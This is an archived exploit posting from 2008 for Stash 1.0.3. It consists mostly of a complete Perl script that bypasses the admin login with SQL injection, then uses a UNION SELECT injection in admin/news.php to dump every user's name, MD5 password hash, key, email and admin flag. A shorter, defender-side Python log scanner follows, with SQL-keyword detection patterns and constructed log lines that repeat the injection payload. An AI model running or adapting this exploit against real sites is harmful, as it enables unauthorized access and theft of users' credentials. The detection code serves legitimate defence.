Stash 1.0.3 (SQL) User Credentials Disclosure Exploit
Source: http://gnix.netsons.org  Author: Gnix  Published: 2008-10-10
#!/usr/bin/perl -w
#
# User credentials disclosure exploit - stash103exp.pl
#
# Gnix <gnixmail@gmail.com>
# http://gnix.netsons.org
#
# This exploit uses an SQL injection in the file admin/login.php to
# bypass the login, and then an SQL injection in admin/news.php
# to extract all the user records. Note: passwords are stored as MD5 hashes.
#
# Output for each user:
# user_id:user_username:user_password:user_key:user_firstname user_lastname:user_email:user_admin
#

use strict;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
use HTTP::Cookies;


# Variables
my $cjar  = new HTTP::Cookies( file => 'cookies.txt',
                               autosave => 1,
                               ignore_discard => 0);
my $agent = new LWP::UserAgent;
$agent->agent('Lynxy/6.6.6dev.8 libwww-FM/3.14159FM');
 

# Check argv
if(@ARGV != 3) {
  print "[?] Usage  : perl stash103exp.pl <stash_dir_address> <admin_username> <table_prefix>\n";
  print "[?] Example: perl stash103exp.pl http://site/stash/ avril st_\n";
  exit(1);
}


# Authentication
if(!auth($ARGV[0],$ARGV[1])) {
  print "[!] Error during the authentication!\n";
  exit(1);
}


# Extract all the user information
my $info = extract_data($ARGV[0],$ARGV[2]);
if(!$info) {
  print "[!] Error when extracting data!\n";
  exit(1);
}


# Print user information
$_ = $info;
my @users = m/<1>(.+?)<2>/g;
foreach my $user (@users) {
  print $user."\n";
}


exit(0);

###########################################################################



# Login as $ARGV[1] and save the PHPSESSID cookie
sub auth
{
  my $address = shift;
  my $username= shift;

  # Login
  my $response= $agent->post($address.'admin/login.php',
                             {username   => "' OR user_username = '$username",
                              password   => "any",
                              submit    => "Log in"});

  # Save PHPSESSID cookie
  $cjar->extract_cookies($response);

  return $response->is_redirect();
}



# Inject a query through news.php to extract all the info about every user
sub extract_data
{
  my $address  = shift;
  my $prefix  = shift;

  my $query = "-1 UNION SELECT 1 AS news_id, 'Injection' AS news_title,  ".
   "CONCAT('<1>',user_id,':',user_username,':',user_password,':',user_key,".
  "':',user_firstname,' ', user_lastname,':', user_email,':', user_admin,".
  "'<2>') AS news_body, 'Mitnick' AS news_author, NOW() AS news_date, 0  ".
  "AS news_comment FROM ".$prefix."news, ".$prefix."user";

  my $request = new HTTP::Request('GET', $address.'admin/news.php?post='.$query);

  $agent->cookie_jar($cjar);
  my $response= $agent->request($request);

  if($response->is_success()) {
    return $response->content();
  }
  else {
    return undef;
  }
}
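As an added example from the defender's side (not part of Gnix's exploit nor of Stash itself), this Python scanner flags the second stage of the technique in web-server access logs: a `post` parameter to admin/news.php that is not a plain integer, or that carries SQL keywords as in the UNION SELECT above. The log lines are constructed, and the Common Log Format layout is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Common Log Format: client ident user [time] "METHOD path HTTP/x" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

# Keywords that never belong in an integer news id (matched case-insensitively).
SQLI_WORDS = re.compile(r"\b(union|select|concat|from)\b", re.IGNORECASE)

def check_news_request(path):
    """Return a reason string if admin/news.php is asked for a non-integer
    'post' id, or None if the request looks legitimate. Only GET paths are
    visible in access logs; the login-form POST body of stage one is not."""
    parts = urlsplit(path)
    if not parts.path.endswith("admin/news.php"):
        return None
    for value in parse_qs(parts.query).get("post", []):  # parse_qs decodes %xx
        if SQLI_WORDS.search(value):
            return "sql-keywords-in-post-id"
        if not re.fullmatch(r"\d+", value.strip()):
            return "non-integer-post-id"
    return None

def scan_log(lines):
    """Return a list of (client, timestamp, reason, path) for suspicious lines."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected log format; skip
        client, ts, method, path, status = m.groups()
        reason = check_news_request(path)
        if reason:
            hits.append((client, ts, reason, path))
    return hits

# Constructed sample lines (not real traffic): a legitimate request, one
# mirroring the exploit's URL-encoded UNION query, and a quote probe.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2008:12:00:01 +0000] "GET /stash/admin/news.php?post=17 HTTP/1.1" 200 4096',
    '10.0.0.9 - - [10/Oct/2008:12:00:07 +0000] "GET /stash/admin/news.php?post=-1%20UNION%20SELECT%201%20AS%20news_id,%27Injection%27%20AS%20news_title,CONCAT(%27%3C1%3E%27,user_id)%20AS%20news_body%20FROM%20st_news,%20st_user HTTP/1.1" 200 8192',
    '10.0.0.9 - - [10/Oct/2008:12:00:09 +0000] "GET /stash/admin/news.php?post=17%27 HTTP/1.1" 500 512',
    '10.0.0.5 - - [10/Oct/2008:12:00:11 +0000] "GET /stash/index.php HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("%s %s %s %s" % hit)
```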
